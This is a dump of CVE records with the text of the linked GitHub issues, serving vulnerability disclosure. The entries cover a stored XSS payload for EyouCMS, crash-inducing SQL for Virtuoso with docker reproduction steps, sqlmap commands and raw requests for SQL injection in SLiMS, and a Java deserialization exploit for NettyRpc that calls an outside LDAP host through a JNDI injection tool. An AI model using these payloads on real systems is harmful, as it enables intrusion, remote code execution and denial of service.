[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/4c14b7a3-5445-460e-a5da-2ad47ccecff6) **Description**: 1. Log in to the backend with an administrator account, click on "Function Map" and add "Document Properties". ![20230823221128](https://github.com/weng-xianhu/eyoucms/assets/72898290/2f362050-2a39-471d-9ae9-a368c9be1f31) 2. Select "Document Properties" and change the name of one of the properties to `<img src=1 onerror=alert(1)`. ![20230823221229](https://github.com/weng-xianhu/eyoucms/assets/72898290/0e805feb-32bb-4d99-9bcf-5abb974cc7b5) ``` POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1 Host: 192.168.3.135 Content-Length: 100 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.135 Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; users_id=1; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_GOBACK_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; workspaceParam=index%7CArchivesFlag Connection: close table=archives_flag&id_name=id&id_value=1&field=flag_name&value=<img src=1 onerror=alert(1)> ``` 3. Choose "Content Management", select an article at random, click "Edit" and a pop-up window will appear. ![20230823221925](https://github.com/weng-xianhu/eyoucms/assets/72898290/ae80ac41-06e7-43a3-b62a-125fd6c4dd82) The principle is the same as https://github.com/weng-xianhu/eyoucms/issues/52.
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/54/comments
1
2023-08-23T14:31:08Z
2024-03-22T06:30:31Z
https://github.com/weng-xianhu/eyoucms/issues/54
1,863,459,135
54
5,779
CVE-2023-48945
2023-11-29T20:15:07.797
A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1172" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.11:*:*:*:open_source:*:*:*", "matchCriteriaId": "CFFFE658-0D7C-4439-B193-1595F8F965F0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/openlink/virtuoso-opensource/issues/1172
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```sql CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ; ``` Server Log: ``` 14:21:24 HTTP/WebDAV server online at 8890 14:21:24 Server online at 1111 (pid 1) *** stack smashing detected ***: terminated ``` Due to the stack smashing, I failed to retrieve the correct backtrace. ways to reproduce (write poc to the file '/tmp/test.sql' first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ```
Fuzzer: Virtuoso 7.2.11 crashed by stack smashing
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1172/comments
2
2023-11-14T14:41:15Z
2023-11-20T16:31:19Z
https://github.com/openlink/virtuoso-opensource/issues/1172
1,992,885,538
1,172
5,780
CVE-2023-48952
2023-11-29T20:15:08.133
An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1175" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1175" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.11:*:*:*:open_source:*:*:*", "matchCriteriaId": "CFFFE658-0D7C-4439-B193-1595F8F965F0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/openlink/virtuoso-opensource/issues/1175
[ "Exploit", "Issue Tracking" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ; INSERT INTO v0 VALUES ( 20 , -1 ) ; SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + -1 * 40 ; ``` backtrace: ```c #0 0x876418 (box_deserialize_reusing+0x38) #1 0x87917e (sslr_qst_get+0x46e) #2 0x81f2f6 (select_node_input_vec+0x656) #3 0x7ba667 (select_node_input+0xa7) #4 0x7af05e (qn_input+0x3ce) #5 0x7af78f (qn_ts_send_output+0x23f) #6 0x7b509e (table_source_input+0x16ee) #7 0x7af05e (qn_input+0x3ce) #8 0x7af4c6 (qn_send_output+0x236) #9 0x7af05e (qn_input+0x3ce) #10 0x7af4c6 (qn_send_output+0x236) #11 0x8214bd (set_ctr_vec_input+0x99d) #12 0x7af05e (qn_input+0x3ce) #13 0x7c084b (qr_exec+0x11db) #14 0x7ce1d6 (sf_sql_execute+0x11a6) #15 0x7cecde (sf_sql_execute_w+0x17e) #16 0x7d799d (sf_sql_execute_wrapper+0x3d) #17 0xe214bc (future_wrapper+0x3fc) #18 0xe28dbe (_thread_boot+0x11e) #19 0x7fca3837c609 (start_thread+0xd9) #20 0x7fca3814c133 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ```
Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1175/comments
3
2023-11-14T15:13:36Z
2023-12-04T14:53:16Z
https://github.com/openlink/virtuoso-opensource/issues/1175
1,992,951,081
1,175
5,781
CVE-2023-48813
2023-12-01T16:15:07.487
Senayan Library Management Systems (Slims) 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/fines_report.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/komangsughosa/CVE-ID-not-yet/blob/main/slims/slims9_bulian-9.6.1-SQLI-fines_report.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/slims/slims9_bulian/issues/217" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/komangsughosa/CVE-ID-not-yet/blob/main/slims/slims9_bulian-9.6.1-SQLI-fines_report.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/slims/slims9_bulian/issues/217" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system_bulian:9.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "0439647C-9560-44A0-B186-BFDF828ECD17", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/217
[ "Exploit", "Issue Tracking" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** A SQL Injection exists in admin/modules/reporting/customs/fines_report.php at the code below ```php $selected_year = date('Y'); if (isset($_GET['year']) AND !empty($_GET['year'])) { $selected_year = (integer)$_GET['year']; } // month $selected_month = date('m'); if (isset($_GET['month']) AND !empty($_GET['month'])) { $selected_month = $_GET['month']; } // query fines data to database // echo "SELECT SUBSTRING(`fines_date`, -2) AS `mdate`, SUM(debet) AS `dtotal`, `fines_id` FROM `fines` WHERE `fines_date` LIKE '$selected_year-$selected_month%' GROUP BY `fines_date`"; $_fines_q = $dbs->query("SELECT SUBSTRING(`fines_date`, -2) AS `mdate`, SUM(debet) AS `dtotal` FROM `fines` WHERE `fines_date` LIKE '$selected_year-$selected_month%' GROUP BY `fines_date`"); while ($_fines_d = $_fines_q->fetch_row()) { $date = (integer)preg_replace('@^0+@i', '',$_fines_d[0]); $fines_data[$date] = '<div class="data"><a href="'.AWB.'modules/reporting/customs/member_fines_list.php?reportView=true&singleDate=true&finesDate='.$selected_year.'-'.$selected_month.'-'.$date.'" class="notAJAX openPopUp" width="800" height="600" title="'.__('Member Fines List').'">'.currency($_fines_d[1]?:'0').'</a></div>'; } // generate calendar $output = simbio_date::generateCalendar($selected_year, $selected_month, $fines_data); // print out echo '<div class="mb-2">'.__('Fines count report for').' <strong>'.$months[$selected_month].', '.$selected_year.'</strong> <a class="s-btn btn btn-default printReport" onclick="window.print()" href="#">'.__('Print Current Page').'</a></div>'."\n"; echo $output; ``` **To Reproduce** Steps to reproduce the behavior: 1. Login as admin or user that has access to reportings/fines report 2. make sure burp suit is on to capture the request such as below: 3. save the request into a file (bredel.req) 4. run the test with sqlmao with the command `sqlmap -r bredel.req --level 5 --risk 3 -p month --dbms=mysql --current-user` **Proof-of-Concept** <img width="1440" alt="image" src="https://github.com/slims/slims9_bulian/assets/116742485/b09cb45d-610f-4880-a180-b6398f3b3fc7"> **bredel.req** ``` GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/fines_report.php?year=2020&month=06&applyFilter=Apply+Filter&reportView=true HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting Accept-Encoding: gzip, deflate, br Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7 Cookie: SenayanAdmin=0ejb8l7fhdhb1l8tltuvv5kl2n; admin_logged_in=1; SenayanMember=lsbmnom42kgsogjjvbfu1lrml8; csrftoken=hzryTvpMiKtoV1DPIYB8X31DZ69pidYh; wp-settings-time-1=1695891043; PHPSESSID=79fe03f30f50c62d5dec9aac767e1073 Connection: close ``` **Desktop (please complete the following information):** - Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.6.1
[Security Bugs] SQL Injection at fines_report.php
https://api.github.com/repos/slims/slims9_bulian/issues/217/comments
1
2023-11-13T00:00:09Z
2025-01-01T10:42:59Z
https://github.com/slims/slims9_bulian/issues/217
1,989,644,007
217
5,782
CVE-2023-48893
2023-12-01T16:15:07.607
SLiMS (aka SENAYAN Library Management System) through 9.6.1 allows admin/modules/reporting/customs/staff_act.php SQL Injection via startDate or untilDate.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-staff_act.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/slims/slims9_bulian/issues/209" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-staff_act.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/slims/slims9_bulian/issues/209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system_bulian:9.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "0439647C-9560-44A0-B186-BFDF828ECD17", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/209
[ "Exploit", "Issue Tracking" ]
github.com
[ "slims", "slims9_bulian" ]
## The Bug A SQL Injection exists in `admin/modules/reporting/customs/staff_act.php` at the code below ```php // create datagrid $reportgrid = new report_datagrid(); $reportgrid->setSQLColumn('u.realname AS \''.__('Real Name').'\'', 'u.username AS \''.__('Login Username').'\'', 'u.user_id AS \''.__('Bibliography Data Entry').'\'', 'u.user_id AS \''.__('Item Data Entry').'\'', 'u.user_id AS \''.__('Member Data Entry').'\'', 'u.user_id AS \''.__('Loans').'\'', 'u.user_id AS \''.__('Returns').'\'', 'u.user_id AS \''.__('Extends').'\''); $reportgrid->setSQLorder('realname ASC'); // is there any search $criteria = 'user_id IS NOT NULL '; $reportgrid->setSQLCriteria($criteria); $start_date = '2000-01-01'; if (isset($_GET['startDate'])) { $start_date = $_GET['startDate']; // unsanitized input 1 } $until_date = date('Y-m-d'); if (isset($_GET['untilDate'])) { $until_date = $_GET['untilDate']; // unsanitized input 2 } ``` **To Reproduce** Steps to reproduce the behavior: 1. Login as admin or user that has access to Staff Activity Reporting 2. Make sure the burp is on to capture the request as below ![image](https://github.com/slims/slims9_bulian/assets/143168734/f72b9929-b25b-4979-94fb-d630d9ad9fd0) 3. Save the request into a file (example.req) 4. Run the test with sqlmap with the command ``` sqlmap command: sqlmap -r example.req --level 5 --risk 3 -p startDate --random-agent --dbms=mysql --current-user ``` 5. It's in ![image](https://github.com/slims/slims9_bulian/assets/143168734/bbba465d-7b99-46f2-bb52-2a864f44d6ac) **example.req** ``` GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/staff_act.php?startDate=2000-01-01&untilDate=2023-08-2&applyFilter=Apply+Filter&reportView=true HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting Cookie: SenayanAdmin=68n7ojemg853g6ipos463oo2o2; admin_logged_in=1; SenayanMember=nva8k0bovrr32qckn46cs9u46h Upgrade-Insecure-Requests: 1 ``` ## Screenshots **proof-of-concept current user** ![image](https://github.com/slims/slims9_bulian/assets/143168734/fbcd3feb-60e3-402d-8e35-64ed2c79cb2e) **Versions** - OS: Windows - Browser: Firefox | 116.0.3 (64-bit) - Slims Version: slims9_bulian-9.6.1 ## Notes
Vuln0wned Report: SQL Injection in staff_act.php
https://api.github.com/repos/slims/slims9_bulian/issues/209/comments
0
2023-09-01T09:36:16Z
2023-09-05T06:25:21Z
https://github.com/slims/slims9_bulian/issues/209
1,877,090,139
209
5,783
CVE-2023-48886
2023-12-01T23:15:07.920
A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/luxiaoxun/NettyRpc" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/luxiaoxun/NettyRpc/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/luxiaoxun/NettyRpc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/luxiaoxun/NettyRpc/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:luxiaoxun:nettyrpc:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "950F4B86-CD1E-4630-B86F-B14F7439FF04", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/luxiaoxun/NettyRpc/issues/53
[ "Exploit" ]
github.com
[ "luxiaoxun", "NettyRpc" ]
# Describe the Vulnerability A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request. # Environment - NettyRpc: v1.2 - JVM version: JDK 1.8(Tested on JDK 1.8.0_65) # Preparation for Vulnerability Verification #### For the purpose of this proof of concept and simplicity, the following assumptions are made: 1. There is an additional method named "sayObject" in the HelloService ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/7475f041-59de-4c00-ba42-3ca8973da117) ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/a93b0291-2ab2-4e1a-8d7b-d57c3e5302bc) ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/fd7d188b-9a67-4f5d-aa0c-d7c54c1446c6) 2. The application has dependencies on commons-collections and commons-beanutils.: ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/4834cf6e-7aaf-4c27-88f8-76247f872ff7) 3 Remote class loading is allowed (either because an old JDK version is being used, or by using the JVM argument -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) # Exploit and Analysis ## POC 1. Obtain the JNDI injection tool from: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 2. Use the following command below to establish a JNDI link java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/4ed1dc26-37d4-44a1-b279-b2f1716ce352) 3. Paste the provided POC code below into the project, ensuring to modify the JNDI URL address! ```java package com.app.test.client; import com.netty.rpc.client.RpcClient; import com.app.test.service.HelloService; import com.sun.rowset.JdbcRowSetImpl; import org.apache.commons.beanutils.BeanComparator; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.util.Collections; import java.util.Comparator; import java.util.TreeMap; public class RpcObject { public static void main(String[] args) throws Exception { final RpcClient rpcClient = new RpcClient("127.0.0.1:2181"); final HelloService syncClient = rpcClient.createService(HelloService.class, "1.0"); BeanComparator cmp = new BeanComparator("lowestSetBit", Collections.reverseOrder()); // Modify the jndiURL here! String jndiUrl = "ldap://169.254.197.239:1389/0i9tqe"; Object trig = makeTreeMap(makeJNDIRowSet(jndiUrl), cmp); setFieldValue(cmp, "property", "databaseMetaData"); syncClient.helloObject(trig); rpcClient.stop(); } public static TreeMap<Object, Object> makeTreeMap (Object tgt, Comparator comparator ) throws Exception { TreeMap<Object, Object> tm = new TreeMap<>(comparator); Class<?> entryCl = Class.forName("java.util.TreeMap$Entry"); Constructor<?> entryCons = entryCl.getDeclaredConstructor(Object.class, Object.class, entryCl); entryCons.setAccessible(true); Field leftF = getField(entryCl, "left"); Field rootF = getField(TreeMap.class, "root"); Object root = entryCons.newInstance(tgt, tgt, null); leftF.set(root, entryCons.newInstance(tgt, tgt, root)); rootF.set(tm, root); setFieldValue(tm, "size", 2); return tm; } public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception { try { Field field = clazz.getDeclaredField(fieldName); if ( field != null ) field.setAccessible(true); else if ( clazz.getSuperclass() != null ) field = getField(clazz.getSuperclass(), fieldName); return field; } catch ( NoSuchFieldException e ) { if ( !clazz.getSuperclass().equals(Object.class) ) { return getField(clazz.getSuperclass(), fieldName); } throw e; } } public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static JdbcRowSetImpl makeJNDIRowSet (String jndiUrl ) throws Exception { JdbcRowSetImpl rs = new JdbcRowSetImpl(); rs.setDataSourceName(jndiUrl); rs.setMatchColumn("foo"); getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null); return rs; }} ``` 4. Execute RpcServerBootstrap2 in the "com.app.test.server" package. ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/3bc65ffa-570e-460d-a108-2fb6025b19ce) 5. Run the POC code, and examine the obtained result: ![image](https://github.com/luxiaoxun/NettyRpc/assets/46960004/2c967784-6ed1-468a-b530-51d5477d338b) 6. Stack Trace: ```java lookup:417, InitialContext (javax.naming) connect:624, JdbcRowSetImpl (com.sun.rowset) getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset) invoke0:-1, NativeMethodAccessorImpl (sun.reflect) invoke:62, NativeMethodAccessorImpl (sun.reflect) invoke:43, DelegatingMethodAccessorImpl (sun.reflect) invoke:497, Method (java.lang.reflect) invokeMethod:2170, PropertyUtilsBean (org.apache.commons.beanutils) getSimpleProperty:1332, PropertyUtilsBean (org.apache.commons.beanutils) getNestedProperty:770, PropertyUtilsBean (org.apache.commons.beanutils) getProperty:846, PropertyUtilsBean (org.apache.commons.beanutils) getProperty:426, PropertyUtils (org.apache.commons.beanutils) compare:157, BeanComparator (org.apache.commons.beanutils) compare:1291, TreeMap (java.util) put:538, TreeMap (java.util) read:162, MapSerializer (com.esotericsoftware.kryo.serializers) read:39, MapSerializer (com.esotericsoftware.kryo.serializers) readObject:734, Kryo (com.esotericsoftware.kryo) read:391, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers) read:302, DefaultArraySerializers$ObjectArraySerializer (com.esotericsoftware.kryo.serializers) readObject:734, Kryo (com.esotericsoftware.kryo) read:125, ObjectField (com.esotericsoftware.kryo.serializers) read:543, FieldSerializer (com.esotericsoftware.kryo.serializers) readObject:712, Kryo (com.esotericsoftware.kryo) deserialize:43, KryoSerializer (com.netty.rpc.serializer.kryo) decode:42, RpcDecoder (com.netty.rpc.codec) decodeRemovalReentryProtection:505, ByteToMessageDecoder (io.netty.handler.codec) callDecode:444, ByteToMessageDecoder (io.netty.handler.codec) channelRead:283, ByteToMessageDecoder (io.netty.handler.codec) invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel) invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel) fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel) fireChannelRead:328, ByteToMessageDecoder (io.netty.handler.codec) channelRead:302, ByteToMessageDecoder (io.netty.handler.codec) invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel) invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel) fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel) channelRead:287, IdleStateHandler (io.netty.handler.timeout) invokeChannelRead:374, AbstractChannelHandlerContext (io.netty.channel) invokeChannelRead:360, AbstractChannelHandlerContext (io.netty.channel) fireChannelRead:352, AbstractChannelHandlerContext (io.netty.channel) channelRead:1422, DefaultChannelPipeline$HeadContext (io.netty.channel) 